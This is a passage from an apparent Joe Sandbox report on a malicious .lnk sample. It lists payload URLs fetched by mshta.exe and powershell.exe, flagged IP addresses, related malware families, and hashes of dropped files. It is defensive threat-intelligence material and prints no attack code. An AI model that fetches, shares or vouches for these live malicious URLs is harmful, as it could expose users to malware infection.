                                                                                https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhmshta.exe, 00000006.00000003.1966405671.0000021129AFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp413mshta.exe, 00000006.00000003.1966574976.0000021129DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://qu.ax/Mcyga.pdfppowershell.exe, 00000009.00000002.1707322439.0000022234D38000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  104.21.48.1
                                                                                  static.klipxuhaq.shopUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  172.67.140.151
                                                                                  denek.local-wanderer.shopUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  188.245.211.225
                                                                                  qu.axIran (ISLAMIC Republic Of)
                                                                                  16322PARSONLINETehran-IRANIRfalse
                                                                                  IP
                                                                                  127.0.0.1
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1576537
                                                                                  Start date and time:2024-12-17 08:37:11 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 35s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:22
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:ei0woJS3Dy.lnk
                                                                                  renamed because original name is a hash value
                                                                                  Original Sample Name:68b851c1155b8b5b40728d9eba2bb219596a2cd955a1568553d3895e30ace0a0.lnk.d.lnk
                                                                                  Detection:MAL
                                                                                  Classification:mal92.evad.winLNK@31/68@9/4
                                                                                  EGA Information:Failed
                                                                                  HCA Information:Failed
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .lnk
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 2.16.229.162, 2.16.228.134, 162.159.61.3, 172.64.41.3, 3.219.243.226, 3.233.129.217, 52.6.155.20, 52.22.41.97, 199.232.214.172, 23.203.161.57, 2.19.198.27, 23.32.239.56, 2.20.40.170, 2.20.68.228, 2.20.68.207, 23.195.39.65, 52.149.20.212, 34.237.241.83
                                                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                                  • Execution Graph export aborted for target bdd.exe, PID 8788 because it is empty
                                                                                  • Execution Graph export aborted for target mshta.exe, PID 6252 because there are no executed function
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7548 because it is empty
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7928 because it is empty
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8052 because it is empty
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  02:38:17API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                  02:38:19API Interceptor159x Sleep call for process: powershell.exe modified
                                                                                  02:38:34API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.48.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                  • twirpx.org/administrator/index.php
                                                                                  SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.antipromil.site/7ykh/
                                                                                  172.67.140.151Setup.exeGet hashmaliciousVidarBrowse
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    qu.axPayment Notification.lnkGet hashmaliciousXWormBrowse
                                                                                    • 104.21.86.112
                                                                                    Sj5NsTbVHG.lnkGet hashmaliciousAsyncRAT, VenomRATBrowse
                                                                                    • 172.67.218.147
                                                                                    93GwwLKH1N.exeGet hashmaliciousAmadey, PureLog StealerBrowse
                                                                                    • 95.164.4.151
                                                                                    4YNCkA7eR5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 45.83.31.187
                                                                                    JUSTIFICANTE DE PAGO PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 142.202.240.89
                                                                                    oT6SM13If6.exeGet hashmaliciousChaos, NoCry, PureLog Stealer, XWormBrowse
                                                                                    • 66.179.251.65
                                                                                    JUSTIFICANTE DE PAGO CF.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 45.83.31.187
                                                                                    transfer - 9783423-52323-248.263.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 207.32.217.188
                                                                                    Factura para el pago 07848956897.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 207.32.217.188
                                                                                    Factura-077865676347.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 205.185.124.198
                                                                                    bg.microsoft.map.fastly.net69633f.msiGet hashmaliciousVidarBrowse
                                                                                    • 199.232.214.172
                                                                                    fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                    • 199.232.210.172
                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                    • 199.232.214.172
                                                                                    #U041e#U043f#U043b#U0430#U0442#U0430.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.210.172
                                                                                    Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                    • 199.232.210.172
                                                                                    wayneenterprisesbatcave-6.0.1901-windows-installer.msiGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 199.232.214.172
                                                                                    Untitled-1.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                    • 199.232.210.172
                                                                                    new.batGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 199.232.214.172
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CLOUDFLARENETUSpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 172.67.177.134
                                                                                    HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.67.152
                                                                                    https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.18.11.207
                                                                                    Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.32.1
                                                                                    hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.67.152
                                                                                    Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 172.67.210.11
                                                                                    usererage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.2.70
                                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.48.233
                                                                                    SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.87.65
                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.56.70
                                                                                    PARSONLINETehran-IRANIRm68k.elfGet hashmaliciousUnknownBrowse
                                                                                    • 188.245.52.94
                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.99.180.146
                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 46.62.214.21
                                                                                    elitebotnet.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 188.245.64.10
                                                                                    hax.arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 5.78.140.197
                                                                                    jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                    • 178.169.26.240
                                                                                    http://www.javatpoint.com.cach3.com/Get hashmaliciousUnknownBrowse
                                                                                    • 5.78.160.218
                                                                                    botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                    • 188.245.125.217
                                                                                    mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.98.88.25
                                                                                    mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 188.245.39.68
                                                                                    CLOUDFLARENETUSpre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 172.67.177.134
                                                                                    HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.67.152
                                                                                    https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.18.11.207
                                                                                    Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.32.1
                                                                                    hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.67.152
                                                                                    Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 172.67.210.11
                                                                                    usererage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.2.70
                                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.48.233
                                                                                    SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.87.65
                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.56.70
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    3b5074b1b5d032e5620f69f9f700ff0epre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    usererage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    Nueva orden de compra-836528268278278.xlsx.exeGet hashmaliciousUnknownBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                    • 188.245.211.225
                                                                                    • 172.67.140.151
                                                                                    37f463bf4616ecd445d4a1937da06e19Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.48.1
                                                                                    Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                    • 104.21.48.1
                                                                                    69633f.msiGet hashmaliciousVidarBrowse
                                                                                    • 104.21.48.1
                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.48.1
                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                    • 104.21.48.1
                                                                                    fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                    • 104.21.48.1
                                                                                    1iC0WTxgUf.exeGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.48.1
                                                                                    Instruction_695-18112-002_Rev.PDF.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.48.1
                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.48.1
                                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, RHADAMANTHYS, XWorm, XmrigBrowse
                                                                                    • 104.21.48.1
                                                                                    No context
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.8807830211346928
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG95:0J7adfWuK0p/QDfKoPeuP0aN4fqoxS
                                                                                    MD5:B672B101FDBD03CC95C0457BCB1800AB
                                                                                    SHA1:E6350B68CDD2B860EA0A0A6D5BEF4F60404CFA2C
                                                                                    SHA-256:D739BACDA1F8AEEC2223C70CF98DABE77D49BEE9D33E94838DF6CC97271C4467
                                                                                    SHA-512:E29CEFEFB3A9006EF2B69E255CA0CF7854806ABAAD9FE559432C8F4611FFF2F0E9A72017AA5D19EEBE9F00D32BEDC900119C3CF6A89BF64BF5E495416B14AAA5
                                                                                    Malicious:false
                                                                                    Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x44431e44, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                    Category:dropped
                                                                                    Size (bytes):1310720
                                                                                    Entropy (8bit):0.7880648525306768
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:E/aSB2ESB2SSjlK/lv4T9DY1k0aXjJ8VQVYkr3g16iq2UPkLk+kYv/gKr51KrgzB:XazaPv4V4fXq2UaB
                                                                                    MD5:B4E66A49A261976B1A063FB905AB77E1
                                                                                    SHA1:58A818B1643764ED0C929F27780DCD8FB7CA84F7
                                                                                    SHA-256:2A39178C7A41EC57F552C455AAD86E8BB0479ADD20037129688FC6A919CD2756
                                                                                    SHA-512:28AF264F791FE548ABF2B45A4B15CAFE15E49A2943195DCD3B497AD325E57755343A203909BAED137CAC893135F8237736E30D124C944F7EFAFDDE0752B50C2A
                                                                                    Malicious:false
                                                                                    Preview:DC.D... ...............X\...;...{......................X............{...&...|E.h...........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......12...{...............................................................................................................................................................................................2...{...................................|...&...|e<................0.v..&...|E..........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):0.08116596299175591
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:D//KYeD+0QTemXlVG0+q2Iqe8lQZgDlAllNTt/4ll/Q6beV/:D//KzDDUGE8lvAHtc6V
                                                                                    MD5:2631BC55E9AED8B4B50FB6C0D63D26E3
                                                                                    SHA1:9515D7A9A99684332098FC59BDF9C8F657F44506
                                                                                    SHA-256:A3B09C4F067358747928CFD117904ADEFD4DE08F248C7BE241CEB66E2FB8E904
                                                                                    SHA-512:20C78F33EED329DAD434BF2AC18FACC693033144E194F775F264A626A3BBC3A8F01475F714EAC84183115B77E5C3FF5EB7A5F8B67F261E35072031E3AD282404
                                                                                    Malicious:false
                                                                                    Preview:.A*(.....................................;...{...&...|E......{...............{.......{....:......{.................0.v..&...|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.230100306925872
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:75AQyq2PFi2nKuAl9OmbnIFUt8OiWYG1Zmw+OZQRkwOFi2nKuAl9OmbjLJ:754vdZHAahFUt8Ot1/+OK5wZHAaSJ
                                                                                    MD5:C4374ABECC56064E9FD1CD4B3FBCB0E0
                                                                                    SHA1:5FD2C56D380DF0D829E34A9BD132C0F43143F1E2
                                                                                    SHA-256:76316ADEC5A299EC832877E03CB67BF0687665655AF7F710089D2562BC23BC7A
                                                                                    SHA-512:F95AD8EC8B8E54283AC89E70DC1B6BD75CA7ECC21BEB8A7C89675EEFFA4B2FC89265A22AB4C244EE3575FC553B892C074AFF41B93939C67B823E75FE6B525909
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:23.669 f30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:23.672 f30 Recovering log #3.2024/12/17-02:38:23.673 f30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.230100306925872
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:75AQyq2PFi2nKuAl9OmbnIFUt8OiWYG1Zmw+OZQRkwOFi2nKuAl9OmbjLJ:754vdZHAahFUt8Ot1/+OK5wZHAaSJ
                                                                                    MD5:C4374ABECC56064E9FD1CD4B3FBCB0E0
                                                                                    SHA1:5FD2C56D380DF0D829E34A9BD132C0F43143F1E2
                                                                                    SHA-256:76316ADEC5A299EC832877E03CB67BF0687665655AF7F710089D2562BC23BC7A
                                                                                    SHA-512:F95AD8EC8B8E54283AC89E70DC1B6BD75CA7ECC21BEB8A7C89675EEFFA4B2FC89265A22AB4C244EE3575FC553B892C074AFF41B93939C67B823E75FE6B525909
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:23.669 f30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-02:38:23.672 f30 Recovering log #3.2024/12/17-02:38:23.673 f30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):331
                                                                                    Entropy (8bit):5.175202329087164
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7t96Q+q2PFi2nKuAl9Ombzo2jMGIFUt8OkagZmw+OkaQVkwOFi2nKuAl9Ombzo23:72vdZHAa8uFUt8Okf/+OkN5wZHAa8RJ
                                                                                    MD5:5686202FC13A941381A8226A61553C2F
                                                                                    SHA1:B9FD4B6F2108C90D9D0E15FDF07BC880A9A8AF8C
                                                                                    SHA-256:867B7F1740E6817F45E8A92EF5EB7019424163C599253143A53C79973A5F5092
                                                                                    SHA-512:BD32E9F6119C90C9385C404A89AA0A011A83FD2C02E95CE4295D3D525CDC312F57FD391E1B1528B4AB8B210CC109B54E94FB000E572E64B8D9145BC80A5E54CA
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:23.772 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:23.773 b88 Recovering log #3.2024/12/17-02:38:23.773 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):331
                                                                                    Entropy (8bit):5.175202329087164
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7t96Q+q2PFi2nKuAl9Ombzo2jMGIFUt8OkagZmw+OkaQVkwOFi2nKuAl9Ombzo23:72vdZHAa8uFUt8Okf/+OkN5wZHAa8RJ
                                                                                    MD5:5686202FC13A941381A8226A61553C2F
                                                                                    SHA1:B9FD4B6F2108C90D9D0E15FDF07BC880A9A8AF8C
                                                                                    SHA-256:867B7F1740E6817F45E8A92EF5EB7019424163C599253143A53C79973A5F5092
                                                                                    SHA-512:BD32E9F6119C90C9385C404A89AA0A011A83FD2C02E95CE4295D3D525CDC312F57FD391E1B1528B4AB8B210CC109B54E94FB000E572E64B8D9145BC80A5E54CA
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-02:38:23.772 b88 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-02:38:23.773 b88 Recovering log #3.2024/12/17-02:38:23.773 b88 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:modified
                                                                                    Size (bytes):476
                                                                                    Entropy (8bit):4.964783417619833
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqxisBdOg2Hccaq3QYiubpP7E4TX:Y2sRdsaHdMHf3QYhbd7n7
                                                                                    MD5:C7D20D70CC59CEC3F6C1032D7311BCE2
                                                                                    SHA1:3141B917C09C028D385BCCAB2D94C2D11C19F51A
                                                                                    SHA-256:6D26DBB601278D5F2541C70128B034DDCA18ED40DC042E08E0160B8E72490D2F
                                                                                    SHA-512:FC5F2BEDEF0CE8FA54DF40FB7B8E4C92CFD74E248DA27D6FD45815240890E90F2B70281B7D784C51C151A3D82EC0B61C69D7368A89946D5E0C76160106271262
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378981112187882","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":577368},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):476
                                                                                    Entropy (8bit):4.962905575204746
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                    MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                    SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                    SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                    SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):476
                                                                                    Entropy (8bit):4.962905575204746
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                    MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                    SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                    SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                    SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):476
                                                                                    Entropy (8bit):4.962905575204746
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                                                    MD5:F371FDA655516B50D489FC8CFB1306C9
                                                                                    SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                                                    SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                                                    SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):3878
                                                                                    Entropy (8bit):5.232389061703628
                                                                                    Encrypted:false
